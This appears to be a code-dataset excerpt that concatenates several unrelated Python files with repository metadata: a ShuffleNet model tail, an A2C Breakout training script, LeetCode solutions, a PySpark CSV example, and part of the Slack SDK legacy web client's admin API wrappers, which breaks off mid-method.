'num_blocks': [4,8,4],
'groups': 2
}
return ShuffleNet(cfg)
def ShuffleNetG3():
cfg = {
'out_planes': [240,480,960],
'num_blocks': [4,8,4],
'groups': 3
}
return ShuffleNet(cfg)
def test():
net = ShuffleNetG2()
x = torch.randn(1,3,32,32)
y = net(x)
print(y)
# test()
| 32.2
| 126
| 0.604743
|
acff6f99beb5dde18138538b6168c8354c6f6df5
| 2,852
|
py
|
Python
|
examples/A2C.py
|
himanshusahni/Pytorch-RL
|
0d49f6e627f6e3449af2f958b3b03f41f973f355
|
[
"MIT"
] | null | null | null |
examples/A2C.py
|
himanshusahni/Pytorch-RL
|
0d49f6e627f6e3449af2f958b3b03f41f973f355
|
[
"MIT"
] | null | null | null |
examples/A2C.py
|
himanshusahni/Pytorch-RL
|
0d49f6e627f6e3449af2f958b3b03f41f973f355
|
[
"MIT"
] | null | null | null |
import argparse
import gym
import torch
import torchvision.transforms as transforms
import torch.multiprocessing as mp
from pytorch_rl import networks, utils, callbacks, agents, algorithms, policies
if __name__ == '__main__':
parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument('--max_train_steps',
help='maximum environment steps allowed for training',
type=int,
default=100000)
parser.add_argument('--obs_size',
help='resize observations from environment',
type=int,
default=64)
parser.add_argument('--gamma',
help='discount factor',
type=float,
default=0.99)
parser.add_argument('--entropy_weighting',
help='entropy loss contribution',
type=float,
default=0.05)
parser.add_argument('--nb_threads',
help='number of processes for collecting experience',
type=int,
default=5)
parser.add_argument('--nb_rollout_steps',
help='steps per rollout for AC',
type=int,
default=10)
parser.add_argument('--test_freq',
help='testing frequency',
type=int,
default=100)
parser.add_argument('--env',
help='environment name',)
args = parser.parse_args()
# first enable cuda memory sharing
mp.set_start_method('spawn')
# env = ScaledEnv(gym.make('Breakout-v4'))
args.env = 'Breakout-v4'
def make_env():
return gym.make(args.env)
env = make_env()
args.observation_space = (3, args.obs_size, args.obs_size)
args.action_space = env.action_space.n
# args.device = torch.device("cpu")
args.device = torch.device("cuda:1" if torch.cuda.is_available() else "cpu")
policy_network = networks.ConvPolicy_64x64(args.action_space)
value_network = networks.ConvValue_64x64()
policy = policies.MultinomialPolicy
# plotter = VisdomLinePlotter(env_name='ddpg')
# callbacks = [callbacks.PlotCallback(plotter, freq=100), callbacks.PrintCallback(freq=1000)]
callbacks = [callbacks.PrintCallback(freq=100), ]
a2c = algorithms.A2C(policy_network, value_network, args)
agent = agents.MultithreadedOnPolicyDiscreteAgent(
algorithm=a2c,
policy=policy,
callbacks=callbacks,
args=args)
preprocess = transforms.Compose([utils.Resize((64, 64)), utils.ImgToTensor()])
agent.train(make_env, preprocess)
# TODO: verify on an easy environment.
| 39.068493
| 97
| 0.593619
|
acff7095397c157a2ee15736b186ea499a84c28e
| 2,146
|
py
|
Python
|
Python3/1292.py
|
rakhi2001/ecom7
|
73790d44605fbd51e8f7e804b9808e364fcfc680
|
[
"MIT"
] | 854
|
2018-11-09T08:06:16.000Z
|
2022-03-31T06:05:53.000Z
|
Python3/1292.py
|
rakhi2001/ecom7
|
73790d44605fbd51e8f7e804b9808e364fcfc680
|
[
"MIT"
] | 29
|
2019-06-02T05:02:25.000Z
|
2021-11-15T04:09:37.000Z
|
Python3/1292.py
|
rakhi2001/ecom7
|
73790d44605fbd51e8f7e804b9808e364fcfc680
|
[
"MIT"
] | 347
|
2018-12-23T01:57:37.000Z
|
2022-03-12T14:51:21.000Z
|
__________________________________________________________________________________________________
sample 672 ms submission
class Solution:
def maxSideLength(self, mat: List[List[int]], threshold: int) -> int:
M, N = len(mat), len(mat[0])
res = 0
colsum = [0 for i in range(N)]
for i in range(M):
for j in range(N):
colsum[j] += mat[i][j]
l = res + 1
s = sum(colsum[:l])
prev_res = res
if s <= threshold:
res = l
else:
for k in range(0, N - l):
s -= colsum[k]
s += colsum[k + l]
if s <= threshold:
res = l
break
if res >= min(M, N):
break
if prev_res == res:
for j in range(N):
colsum[j] -= mat[i - prev_res][j]
return res
__________________________________________________________________________________________________
sample 688 ms submission
class Solution:
def maxSideLength(self, mat: List[List[int]], threshold: int) -> int:
M, N = len(mat), len(mat[0])
res = 0
colsum = [0 for i in range(N)]
for i in range(M):
for j in range(N):
colsum[j] += mat[i][j]
# print(colsum)
# print(res)
l = res + 1
s = sum(colsum[:l])
prev_res = res
if s <= threshold:
res = l
# print(f'{s}, {t}')
else:
for k in range(0, N - l):
s -= colsum[k]
s += colsum[k + l]
if s <= threshold:
res = l
break
if res >= min(M, N):
break
if prev_res == res:
for j in range(N):
colsum[j] -= mat[i - prev_res][j]
return res
__________________________________________________________________________________________________
| 35.180328
| 98
| 0.45247
|
acff725897b47240154de45609ff5972a15c1cf9
| 497
|
py
|
Python
|
Chapter19/PySpark_Codes/CSV_with_PySpark.py
|
sankumarbigdata/Scala-and-Spark-for-Big-Data-Analytics
|
e99ca192bcfb4bd9a4c3714ba047d6602922aac7
|
[
"MIT"
] | 33
|
2017-09-06T02:15:13.000Z
|
2021-12-10T13:11:18.000Z
|
Chapter19/PySpark_Codes/CSV_with_PySpark.py
|
sankumarbigdata/Scala-and-Spark-for-Big-Data-Analytics
|
e99ca192bcfb4bd9a4c3714ba047d6602922aac7
|
[
"MIT"
] | null | null | null |
Chapter19/PySpark_Codes/CSV_with_PySpark.py
|
sankumarbigdata/Scala-and-Spark-for-Big-Data-Analytics
|
e99ca192bcfb4bd9a4c3714ba047d6602922aac7
|
[
"MIT"
] | 56
|
2017-08-05T22:08:12.000Z
|
2022-03-27T14:10:19.000Z
|
import os
import sys
try:
from pyspark.sql import SparkSession
print("Successfully imported Spark Modules")
except ImportError as e:
print("Can not import Spark Modules", e)
sys.exit(1)
if __name__ == "__main__":
spark = SparkSession\
.builder\
.appName("PCAExample")\
.getOrCreate()
df = spark.read.format("com.databricks.spark.csv").option("header", "true").load("C:/Exp/nycflights13.csv")
df.printSchema()
df.show()
spark.stop()
| 18.407407
| 111
| 0.647887
|
acff72a0191234f0d8cd5bac76ff55db9508f099
| 109,962
|
py
|
Python
|
slack_sdk/web/legacy_client.py
|
y-adachi-00one/python-slack-sdk
|
8f65b9410e04be351b98f6b551b5edfb456b1de2
|
[
"MIT"
] | null | null | null |
slack_sdk/web/legacy_client.py
|
y-adachi-00one/python-slack-sdk
|
8f65b9410e04be351b98f6b551b5edfb456b1de2
|
[
"MIT"
] | null | null | null |
slack_sdk/web/legacy_client.py
|
y-adachi-00one/python-slack-sdk
|
8f65b9410e04be351b98f6b551b5edfb456b1de2
|
[
"MIT"
] | null | null | null |
# !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
#
# *** DO NOT EDIT THIS FILE ***
#
# 1) Modify slack_sdk/web/client.py
# 2) Run `python setup.py codegen`
#
# !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
from asyncio import Future
"""A Python module for interacting with Slack's Web API."""
import os
from io import IOBase
from typing import Union, Sequence, Optional, Dict, Tuple
import slack_sdk.errors as e
from slack_sdk.models.views import View
from .legacy_base_client import LegacyBaseClient, SlackResponse
from .internal_utils import (
_parse_web_class_objects,
_update_call_participants,
_warn_if_text_is_missing,
)
class LegacyWebClient(LegacyBaseClient):
"""A WebClient allows apps to communicate with the Slack Platform's Web API.
https://api.slack.com/methods
The Slack Web API is an interface for querying information from
and enacting change in a Slack workspace.
This client handles constructing and sending HTTP requests to Slack
as well as parsing any responses received into a `SlackResponse`.
Attributes:
token (str): A string specifying an xoxp or xoxb token.
base_url (str): A string representing the Slack API base URL.
Default is 'https://www.slack.com/api/'
timeout (int): The maximum number of seconds the client will wait
to connect and receive a response from Slack.
Default is 30 seconds.
Methods:
api_call: Constructs a request and executes the API call to Slack.
Example of recommended usage:
```python
import os
from slack_sdk.web.legacy_client import LegacyWebClient
client = LegacyWebClient(token=os.environ['SLACK_API_TOKEN'])
response = client.chat_postMessage(
channel='#random',
text="Hello world!")
assert response["ok"]
assert response["message"]["text"] == "Hello world!"
```
Example manually creating an API request:
```python
import os
from slack_sdk.web.legacy_client import LegacyWebClient
client = LegacyWebClient(token=os.environ['SLACK_API_TOKEN'])
response = client.api_call(
api_method='chat.postMessage',
json={'channel': '#random','text': "Hello world!"}
)
assert response["ok"]
assert response["message"]["text"] == "Hello world!"
```
Note:
Any attributes or methods prefixed with _underscores are
intended to be "private" internal use only. They may be changed or
removed at anytime.
"""
def admin_analytics_getFile(
self,
*,
type: str,
date: Optional[str] = None,
metadata_only: Optional[bool] = None,
**kwargs
) -> Union[Future, SlackResponse]:
"""Retrieve analytics data for a given date, presented as a compressed JSON file
Args:
date (str): Date to retrieve the analytics data for,
expressed as YYYY-MM-DD in UTC.
type (str): The type of analytics to retrieve.
The options are currently limited to member.
"""
kwargs.update({"type": type})
if date is not None:
kwargs.update({"date": date})
if metadata_only is not None:
kwargs.update({"metadata_only": metadata_only})
return self.api_call("admin.analytics.getFile", params=kwargs)
def admin_apps_approve(
self, *, app_id: str = None, request_id: str = None, **kwargs
) -> Union[Future, SlackResponse]:
"""Approve an app for installation on a workspace.
Either app_id or request_id is required.
These IDs can be obtained either directly via the app_requested event,
or by the admin.apps.requests.list method.
Args:
app_id (str): The id of the app to approve. e.g. 'A12345'
request_id (str): The id of the request to approve. e.g. 'Ar12345'
Raises:
SlackRequestError: If neither or both the `app_id` and `request_id` args are specified.
"""
if app_id:
kwargs.update({"app_id": app_id})
elif request_id:
kwargs.update({"request_id": request_id})
else:
raise e.SlackRequestError(
"The app_id or request_id argument must be specified."
)
return self.api_call("admin.apps.approve", json=kwargs)
def admin_apps_approved_list(self, **kwargs) -> Union[Future, SlackResponse]:
"""List approved apps for an org or workspace."""
return self.api_call("admin.apps.approved.list", http_verb="GET", params=kwargs)
def admin_apps_clearResolution(
self, *, app_id: str, **kwargs
) -> Union[Future, SlackResponse]:
"""Clear an app resolution
Args:
app_id (str): The id of the app whose resolution you want to clear/undo.
"""
kwargs.update({"app_id": app_id})
return self.api_call(
"admin.apps.clearResolution", http_verb="POST", params=kwargs
)
def admin_apps_requests_list(self, **kwargs) -> Union[Future, SlackResponse]:
"""List app requests for a team/workspace."""
return self.api_call("admin.apps.requests.list", http_verb="GET", params=kwargs)
def admin_apps_restrict(self, **kwargs) -> Union[Future, SlackResponse]:
"""Restrict an app for installation on a workspace."""
return self.api_call("admin.apps.restrict", json=kwargs)
def admin_apps_restricted_list(self, **kwargs) -> Union[Future, SlackResponse]:
"""List restricted apps for an org or workspace."""
return self.api_call(
"admin.apps.restricted.list", http_verb="GET", params=kwargs
)
def admin_apps_uninstall(
self,
*,
app_id: str,
enterprise_id: Optional[str] = None,
team_ids: Optional[Union[str, Sequence[str]]] = None,
**kwargs
) -> Union[Future, SlackResponse]:
"""Uninstall an app from one or many workspaces, or an entire enterprise organization."""
kwargs.update({"app_id": app_id})
if enterprise_id is not None:
kwargs.update({"enterprise_id": enterprise_id})
if team_ids is not None:
if isinstance(team_ids, (list, Tuple)):
kwargs.update({"team_ids": ",".join(team_ids)})
else:
kwargs.update({"team_ids": team_ids})
return self.api_call("admin.apps.uninstall", http_verb="POST", params=kwargs)
def admin_auth_policy_getEntities(
self,
*,
policy_name: str,
cursor: Optional[str] = None,
entity_type: Optional[str] = None,
limit: Optional[int] = None,
**kwargs
) -> Union[Future, SlackResponse]:
"""Fetch all the entities assigned to a particular authentication policy by name."""
kwargs.update({"policy_name": policy_name})
if cursor is not None:
kwargs.update({"cursor": cursor})
if entity_type is not None:
kwargs.update({"entity_type": entity_type})
if limit is not None:
kwargs.update({"limit": limit})
return self.api_call(
"admin.auth.policy.getEntities", http_verb="POST", params=kwargs
)
def admin_auth_policy_assignEntities(
self,
*,
entity_ids: Union[str, Sequence[str]],
policy_name: str,
entity_type: str,
**kwargs
) -> Union[Future, SlackResponse]:
"""Assign entities to a particular authentication policy."""
if isinstance(entity_ids, (list, Tuple)):
kwargs.update({"entity_ids": ",".join(entity_ids)})
else:
kwargs.update({"entity_ids": entity_ids})
kwargs.update({"policy_name": policy_name})
kwargs.update({"entity_type": entity_type})
return self.api_call(
"admin.auth.policy.assignEntities", http_verb="POST", params=kwargs
)
def admin_auth_policy_removeEntities(
self,
*,
entity_ids: Union[str, Sequence[str]],
policy_name: str,
entity_type: str,
**kwargs
) -> Union[Future, SlackResponse]:
"""Remove specified entities from a specified authentication policy."""
if isinstance(entity_ids, (list, Tuple)):
kwargs.update({"entity_ids": ",".join(entity_ids)})
else:
kwargs.update({"entity_ids": entity_ids})
kwargs.update({"policy_name": policy_name})
kwargs.update({"entity_type": entity_type})
return self.api_call(
"admin.auth.policy.removeEntities", http_verb="POST", params=kwargs
)
def admin_barriers_create(
self,
*,
barriered_from_usergroup_ids: Union[str, Sequence[str]],
primary_usergroup_id: str,
restricted_subjects: Union[str, Sequence[str]],
**kwargs
) -> Union[Future, SlackResponse]:
"""Create an Information Barrier"""
kwargs.update({"primary_usergroup_id": primary_usergroup_id})
if isinstance(barriered_from_usergroup_ids, (list, Tuple)):
kwargs.update(
{"barriered_from_usergroup_ids": ",".join(barriered_from_usergroup_ids)}
)
else:
kwargs.update(
{"barriered_from_usergroup_ids": barriered_from_usergroup_ids}
)
if isinstance(restricted_subjects, (list, Tuple)):
kwargs.update({"restricted_subjects": ",".join(restricted_subjects)})
else:
kwargs.update({"restricted_subjects": restricted_subjects})
return self.api_call("admin.barriers.create", http_verb="POST", params=kwargs)
def admin_barriers_delete(
self, *, barrier_id: str, **kwargs
) -> Union[Future, SlackResponse]:
"""Delete an existing Information Barrier"""
kwargs.update({"barrier_id": barrier_id})
return self.api_call("admin.barriers.delete", http_verb="POST", params=kwargs)
def admin_barriers_update(
self,
*,
barrier_id: str,
barriered_from_usergroup_ids: Union[str, Sequence[str]],
primary_usergroup_id: str,
restricted_subjects: Union[str, Sequence[str]],
**kwargs
) -> Union[Future, SlackResponse]:
"""Update an existing Information Barrier"""
kwargs.update(
{"barrier_id": barrier_id, "primary_usergroup_id": primary_usergroup_id}
)
if isinstance(barriered_from_usergroup_ids, (list, Tuple)):
kwargs.update(
{"barriered_from_usergroup_ids": ",".join(barriered_from_usergroup_ids)}
)
else:
kwargs.update(
{"barriered_from_usergroup_ids": barriered_from_usergroup_ids}
)
if isinstance(restricted_subjects, (list, Tuple)):
kwargs.update({"restricted_subjects": ",".join(restricted_subjects)})
else:
kwargs.update({"restricted_subjects": restricted_subjects})
return self.api_call("admin.barriers.update", http_verb="POST", params=kwargs)
def admin_barriers_list(self, **kwargs) -> Union[Future, SlackResponse]:
"""Get all Information Barriers for your organization"""
return self.api_call("admin.barriers.list", http_verb="GET", params=kwargs)
def admin_conversations_create(
self, *, is_private: bool, name: str, **kwargs
) -> Union[Future, SlackResponse]:
"""Create a public or private channel-based conversation.
Args:
is_private (bool): When true, creates a private channel instead of a public channel
name (str): Name of the public or private channel to create.
org_wide (bool): When true, the channel will be available org-wide.
Note: if the channel is not org_wide=true, you must specify a team_id for this channel
team_id (str): The workspace to create the channel in.
Note: this argument is required unless you set org_wide=true.
"""
kwargs.update({"is_private": is_private, "name": name})
return self.api_call("admin.conversations.create", json=kwargs)
def admin_conversations_delete(
self, *, channel_id: str, **kwargs
) -> Union[Future, SlackResponse]:
"""Delete a public or private channel.
Args:
channel_id (str): The channel to delete.
"""
kwargs.update({"channel_id": channel_id})
return self.api_call("admin.conversations.delete", json=kwargs)
def admin_conversations_invite(
self, *, channel_id: str, user_ids: Union[str, Sequence[str]], **kwargs
) -> Union[Future, SlackResponse]:
"""Invite a user to a public or private channel.
Args:
channel_id (str): The channel that the users will be invited to.
user_ids (str or list): The users to invite.
"""
kwargs.update({"channel_id": channel_id})
if isinstance(user_ids, (list, Tuple)):
kwargs.update({"user_ids": ",".join(user_ids)})
else:
kwargs.update({"user_ids": user_ids})
# NOTE: the endpoint is unable to handle Content-Type: application/json as of Sep 3, 2020.
return self.api_call("admin.conversations.invite", params=kwargs)
def admin_conversations_archive(
self, *, channel_id: str, **kwargs
) -> Union[Future, SlackResponse]:
"""Archive a public or private channel.
Args:
channel_id (str): The channel to archive.
"""
kwargs.update({"channel_id": channel_id})
return self.api_call("admin.conversations.archive", json=kwargs)
def admin_conversations_unarchive(
self, *, channel_id: str, **kwargs
) -> Union[Future, SlackResponse]:
"""Unarchive a public or private channel.
Args:
channel_id (str): The channel to unarchive.
"""
kwargs.update({"channel_id": channel_id})
return self.api_call("admin.conversations.unarchive", json=kwargs)
def admin_conversations_rename(
self, *, channel_id: str, name: str, **kwargs
) -> Union[Future, SlackResponse]:
"""Rename a public or private channel.
Args:
channel_id (str): The channel to rename.
name (str): The name to rename the channel to.
"""
kwargs.update({"channel_id": channel_id, "name": name})
return self.api_call("admin.conversations.rename", json=kwargs)
def admin_conversations_search(self, **kwargs) -> Union[Future, SlackResponse]:
"""Search for public or private channels in an Enterprise organization."""
return self.api_call("admin.conversations.search", params=kwargs)
def admin_conversations_convertToPrivate(
self, *, channel_id: str, **kwargs
) -> Union[Future, SlackResponse]:
"""Convert a public channel to a private channel.
Args:
channel_id (str): The channel to convert to private.
"""
kwargs.update({"channel_id": channel_id})
return self.api_call("admin.conversations.convertToPrivate", json=kwargs)
def admin_conversations_setConversationPrefs(
self, *, channel_id: str, prefs: Union[str, dict], **kwargs
) -> Union[Future, SlackResponse]:
"""Set the posting permissions for a public or private channel.
Args:
channel_id (str): The channel to set the prefs for
prefs (str or dict): The prefs for this channel in a stringified JSON format.
"""
kwargs.update({"channel_id": channel_id, "prefs": prefs})
return self.api_call("admin.conversations.setConversationPrefs", json=kwargs)
def admin_conversations_getConversationPrefs(
self, *, channel_id: str, **kwargs
) -> Union[Future, SlackResponse]:
"""Get conversation preferences for a public or private channel.
Args:
channel_id (str): The channel to get the preferences for.
"""
kwargs.update({"channel_id": channel_id})
return self.api_call("admin.conversations.getConversationPrefs", json=kwargs)
def admin_conversations_disconnectShared(
self, *, channel_id: str, **kwargs
) -> Union[Future, SlackResponse]:
"""Disconnect a connected channel from one or more workspaces.
Args:
channel_id (str): The channel to be disconnected from some workspaces.
"""
kwargs.update({"channel_id": channel_id})
return self.api_call("admin.conversations.disconnectShared", json=kwargs)
def admin_conversations_ekm_listOriginalConnectedChannelInfo(
self, **kwargs
) -> Union[Future, SlackResponse]:
"""List all disconnected channels—i.e.,
channels that were once connected to other workspaces and then disconnected—and
the corresponding original channel IDs for key revocation with EKM.
"""
return self.api_call(
"admin.conversations.ekm.listOriginalConnectedChannelInfo", params=kwargs
)
def admin_conversations_restrictAccess_addGroup(
self, *, channel_id: str, group_id: str, **kwargs
) -> Union[Future, SlackResponse]:
"""Add an allowlist of IDP groups for accessing a channel.
Args:
channel_id (str): The channel to link this group to. e.g. 'C1234567890'
group_id (str): The IDP Group ID to be an allowlist for the private channel. 'S0604QSJC'
team_id (str): The workspace where the channel exists.
This argument is required for channels only tied to one workspace,
and optional for channels that are shared across an organization.
e.g 'T1234'
"""
kwargs.update({"channel_id": channel_id, "group_id": group_id})
return self.api_call(
"admin.conversations.restrictAccess.addGroup",
http_verb="GET",
params=kwargs,
)
def admin_conversations_restrictAccess_listGroups(
self, *, channel_id: str, **kwargs
) -> Union[Future, SlackResponse]:
"""List all IDP Groups linked to a channel.
Args:
channel_id (str): The channel to link this group to. e.g. 'C1234567890'
team_id (str): The workspace where the channel exists.
This argument is required for channels only tied to one workspace,
and optional for channels that are shared across an organization.
e.g 'T1234'
"""
kwargs.update({"channel_id": channel_id})
return self.api_call(
"admin.conversations.restrictAccess.listGroups",
http_verb="GET",
params=kwargs,
)
def admin_conversations_restrictAccess_removeGroup(
self, *, channel_id: str, group_id: str, team_id: str, **kwargs
) -> Union[Future, SlackResponse]:
"""Remove a linked IDP group linked from a private channel.
Args:
channel_id (str): The channel to link this group to. e.g. 'C1234567890'
group_id (str): The IDP Group ID to be an allowlist for the private channel. 'S0604QSJC'
team_id (str): The workspace where the channel exists.
This argument is required for channels only tied to one workspace,
and optional for channels that are shared across an organization.
e.g 'T1234'
"""
kwargs.update(
{"channel_id": channel_id, "group_id": group_id, "team_id": team_id}
)
return self.api_call(
"admin.conversations.restrictAccess.removeGroup",
http_verb="GET",
params=kwargs,
)
def admin_conversations_setTeams(
self, *, channel_id: str, **kwargs
) -> Union[Future, SlackResponse]:
"""Set the workspaces in an Enterprise grid org that connect to a channel.
Args:
channel_id (str): The encoded channel_id to add or remove to workspaces.
"""
kwargs.update({"channel_id": channel_id})
return self.api_call("admin.conversations.setTeams", json=kwargs)
def admin_conversations_getTeams(
self, *, channel_id: str, **kwargs
) -> Union[Future, SlackResponse]:
"""Set the workspaces in an Enterprise grid org that connect to a channel.
Args:
channel_id (str): The channel to determine connected workspaces within the organization for.
"""
kwargs.update({"channel_id": channel_id})
return self.api_call("admin.conversations.getTeams", params=kwargs)
def admin_emoji_add(self, **kwargs) -> Union[Future, SlackResponse]:
"""Add an emoji."""
return self.api_call("admin.emoji.add", http_verb="GET", params=kwargs)
def admin_emoji_addAlias(self, **kwargs) -> Union[Future, SlackResponse]:
"""Add an emoji alias."""
return self.api_call("admin.emoji.addAlias", http_verb="GET", params=kwargs)
def admin_emoji_list(self, **kwargs) -> Union[Future, SlackResponse]:
"""List emoji for an Enterprise Grid organization."""
return self.api_call("admin.emoji.list", http_verb="GET", params=kwargs)
def admin_emoji_remove(self, **kwargs) -> Union[Future, SlackResponse]:
"""Remove an emoji across an Enterprise Grid organization."""
return self.api_call("admin.emoji.remove", http_verb="GET", params=kwargs)
def admin_emoji_rename(self, **kwargs) -> Union[Future, SlackResponse]:
"""Rename an emoji."""
return self.api_call("admin.emoji.rename", http_verb="GET", params=kwargs)
def admin_users_session_reset(
self, *, user_id: str, **kwargs
) -> Union[Future, SlackResponse]:
"""Wipes all valid sessions on all devices for a given user.
Args:
user_id (str): The ID of the user to wipe sessions for. e.g. 'W12345678'
"""
kwargs.update({"user_id": user_id})
return self.api_call("admin.users.session.reset", json=kwargs)
def admin_users_session_invalidate(
self, *, session_id: str, team_id: str, **kwargs
) -> Union[Future, SlackResponse]:
"""Invalidate a single session for a user by session_id.
Args:
session_id (str): The ID of a session
team_id (str): ID of the team that the session belongs to
"""
kwargs.update({"session_id": session_id, "team_id": team_id})
return self.api_call("admin.users.session.invalidate", params=kwargs)
def admin_users_session_list(self, **kwargs) -> Union[Future, SlackResponse]:
"""Lists all active user sessions for an organization"""
return self.api_call("admin.users.session.list", params=kwargs)
def admin_teams_settings_setDefaultChannels(
self, *, team_id: str, channel_ids: Union[str, Sequence[str]], **kwargs
) -> Union[Future, SlackResponse]:
"""Set the default channels of a workspace.
Args:
team_id (str): ID of the team.
channel_ids (str or list): A list of channel_ids.
At least one channel is required. e.g. ['C1A2B3C4D', 'C26Z25Y24']
"""
kwargs.update({"team_id": team_id})
if isinstance(channel_ids, (list, Tuple)):
kwargs.update({"channel_ids": ",".join(channel_ids)})
else:
kwargs.update({"channel_ids": channel_ids})
return self.api_call(
"admin.teams.settings.setDefaultChannels", http_verb="GET", params=kwargs
)
def admin_users_session_getSettings(
self, *, user_ids: Union[str, Sequence[str]], **kwargs
) -> Union[Future, SlackResponse]:
"""Get user-specific session settings—the session duration
and what happens when the client closes—given a list of users.
Args:
user_ids (str or list): The IDs of users you'd like to fetch session settings for.
Note: if a user does not have any active sessions, they will not be returned in the response.
"""
if isinstance(user_ids, (list, Tuple)):
kwargs.update({"user_ids": ",".join(user_ids)})
else:
kwargs.update({"user_ids": user_ids})
return self.api_call("admin.users.session.getSettings", params=kwargs)
def admin_users_session_setSettings(
self, *, user_ids: Union[str, Sequence[str]], **kwargs
) -> Union[Future, SlackResponse]:
"""Configure the user-level session settings—the session duration
and what happens when the client closes—for one or more users.
Args:
user_ids (str or list): The list of user IDs to apply the session settings for.
"""
if isinstance(user_ids, (list, Tuple)):
kwargs.update({"user_ids": ",".join(user_ids)})
else:
kwargs.update({"user_ids": user_ids})
return self.api_call("admin.users.session.setSettings", params=kwargs)
def admin_users_session_clearSettings(
self, *, user_ids: Union[str, Sequence[str]], **kwargs
) -> Union[Future, SlackResponse]:
"""Clear user-specific session settings—the session duration
and what happens when the client closes—for a list of users.
Args:
user_ids (str or list): The list of user IDs to apply the session settings for.
"""
if isinstance(user_ids, (list, Tuple)):
kwargs.update({"user_ids": ",".join(user_ids)})
else:
kwargs.update({"user_ids": user_ids})
return self.api_call("admin.users.session.clearSettings", params=kwargs)
def admin_inviteRequests_approve(
self, *, invite_request_id: str, **kwargs
) -> Union[Future, SlackResponse]:
"""Approve a workspace invite request.
team_id is required if your Enterprise Grid org contains more than one workspace.
Args:
invite_request_id (str): ID of the request to invite. e.g. 'Ir1234'
"""
kwargs.update({"invite_request_id": invite_request_id})
return self.api_call("admin.inviteRequests.approve", json=kwargs)
def admin_inviteRequests_approved_list(
self, **kwargs
) -> Union[Future, SlackResponse]:
"""List all approved workspace invite requests."""
return self.api_call("admin.inviteRequests.approved.list", params=kwargs)
def admin_inviteRequests_denied_list(
self, **kwargs
) -> Union[Future, SlackResponse]:
"""List all denied workspace invite requests."""
return self.api_call("admin.inviteRequests.denied.list", params=kwargs)
def admin_inviteRequests_deny(
self, *, invite_request_id: str, **kwargs
) -> Union[Future, SlackResponse]:
"""Deny a workspace invite request.
Args:
invite_request_id (str): ID of the request to invite. e.g. 'Ir1234'
"""
kwargs.update({"invite_request_id": invite_request_id})
return self.api_call("admin.inviteRequests.deny", json=kwargs)
def admin_inviteRequests_list(self, **kwargs) -> Union[Future, SlackResponse]:
"""List all pending workspace invite requests."""
return self.api_call("admin.inviteRequests.list", params=kwargs)
def admin_teams_admins_list(
self, *, team_id: str, **kwargs
) -> Union[Future, SlackResponse]:
"""List all of the admins on a given workspace.
Args:
team_id (str): ID of the team.
"""
kwargs.update({"team_id": team_id})
return self.api_call("admin.teams.admins.list", http_verb="GET", params=kwargs)
def admin_teams_create(
self, *, team_domain: str, team_name: str, **kwargs
) -> Union[Future, SlackResponse]:
"""Create an Enterprise team.
Args:
team_domain (str): Team domain. e.g. 'slacksoftballteam'
team_name (str): Team name. e.g. 'Slack Softball Team'
"""
kwargs.update({"team_domain": team_domain, "team_name": team_name})
return self.api_call("admin.teams.create", json=kwargs)
def admin_teams_list(self, **kwargs) -> Union[Future, SlackResponse]:
"""List all teams on an Enterprise organization."""
return self.api_call("admin.teams.list", params=kwargs)
def admin_teams_owners_list(
self, *, team_id: str, **kwargs
) -> Union[Future, SlackResponse]:
"""List all of the admins on a given workspace.
Args:
team_id (str): ID of the team.
"""
kwargs.update({"team_id": team_id})
return self.api_call("admin.teams.owners.list", http_verb="GET", params=kwargs)
def admin_teams_settings_info(
self, team_id: str, **kwargs
) -> Union[Future, SlackResponse]:
"""Fetch information about settings in a workspace
Args:
team_id (str): ID of the team.
"""
kwargs.update({"team_id": team_id})
return self.api_call("admin.teams.settings.info", json=kwargs)
def admin_teams_settings_setDescription(
self, *, team_id: str, description: str, **kwargs
) -> Union[Future, SlackResponse]:
"""Set the description of a given workspace.
Args:
team_id (str): ID of the team.
description (str): Description of the team.
"""
kwargs.update({"team_id": team_id, "description": description})
return self.api_call("admin.teams.settings.setDescription", json=kwargs)
def admin_teams_settings_setDiscoverability(
self, *, team_id: str, discoverability: str, **kwargs
) -> Union[Future, SlackResponse]:
"""Sets the icon of a workspace.
Args:
team_id (str): ID of the team.
discoverability (str): This workspace's discovery setting.
It must be set to one of open, invite_only, closed, or unlisted.
"""
kwargs.update({"team_id": team_id, "discoverability": discoverability})
return self.api_call("admin.teams.settings.setDiscoverability", json=kwargs)
def admin_teams_settings_setIcon(
self, *, team_id: str, image_url: str, **kwargs
) -> Union[Future, SlackResponse]:
"""Sets the icon of a workspace.
Args:
team_id (str): ID of the team.
image_url (str): Url of the icon.
"""
kwargs.update({"team_id": team_id, "image_url": image_url})
return self.api_call(
"admin.teams.settings.setIcon", http_verb="GET", params=kwargs
)
def admin_teams_settings_setName(
self, *, team_id: str, name: str, **kwargs
) -> Union[Future, SlackResponse]:
"""Sets the icon of a workspace.
Args:
team_id (str): ID of the team.
name (str): Name of the team.
"""
kwargs.update({"team_id": team_id, "name": name})
return self.api_call("admin.teams.settings.setName", json=kwargs)
def admin_usergroups_addChannels(
self,
*,
team_id: str,
usergroup_id: str,
channel_ids: Union[str, Sequence[str]],
**kwargs
) -> Union[Future, SlackResponse]:
"""Add one or more default channels to an IDP group.
Args:
team_id (str): The workspace to add default channels in. e.g. 'T1234'
usergroup_id (str): ID of the IDP group to add default channels for. e.g. 'S1234'
channel_ids (str or list): Comma separated string of channel IDs. e.g. 'C123,C234' or ['C123', 'C234']
"""
kwargs.update({"team_id": team_id, "usergroup_id": usergroup_id})
if isinstance(channel_ids, (list, Tuple)):
kwargs.update({"channel_ids": ",".join(channel_ids)})
else:
kwargs.update({"channel_ids": channel_ids})
return self.api_call("admin.usergroups.addChannels", params=kwargs)
def admin_usergroups_addTeams(
self, *, usergroup_id: str, team_ids: Union[str, Sequence[str]], **kwargs
) -> Union[Future, SlackResponse]:
"""Associate one or more default workspaces with an organization-wide IDP group.
Args:
usergroup_id (str): ID of the IDP group. e.g. 'S1234'
team_ids (str or list): A comma separated list of encoded team (workspace) IDs.
Each workspace MUST belong to the organization associated with the token.
e.g. 'T12345678,T98765432' or ['T12345678', 'T98765432']
"""
kwargs.update({"usergroup_id": usergroup_id})
if isinstance(team_ids, (list, Tuple)):
kwargs.update({"team_ids": ",".join(team_ids)})
else:
kwargs.update({"team_ids": team_ids})
return self.api_call("admin.usergroups.addTeams", params=kwargs)
def admin_usergroups_listChannels(
self, *, usergroup_id: str, **kwargs
) -> Union[Future, SlackResponse]:
